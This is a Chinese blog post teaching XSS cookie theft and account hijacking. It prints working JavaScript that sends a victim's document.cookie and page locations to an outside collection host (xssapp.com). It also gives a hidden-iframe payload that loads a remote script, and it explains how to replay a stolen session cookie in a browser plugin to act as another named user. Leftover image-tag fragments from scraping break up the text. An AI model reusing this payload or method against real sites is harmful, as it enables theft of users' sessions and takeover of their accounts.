昔日

XSS跨站盗cookie实战

卡客技术博客:

 其实xss大家搜搜下就知道怎么利用了。。但是劫持账户上。大家可能觉得有两个难点..我在这里教大家。。


1.如果收到被害者的cookie.


其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。


比如或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单




kie实战" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>


 


熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了


var x=new Image();
try
{
var myopener='';
myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);
self.location="http://my.oschina.net/samshuai";


上面是我的xss javascript代码。。。


再发个别人的一个利用方式:


1<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>


 


2.获得cookie之后,如何使用?


其实firefox和chrome都有插件可以完成这个功能。直接替换上@铂金小猪 的oscid就可以用他的账号说话了。。


我用的是firefox的web developer toolbar:




XSS盗cookie实战" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>



评论

热度(1)

  1. 昔日卡客技术博客 转载了此文字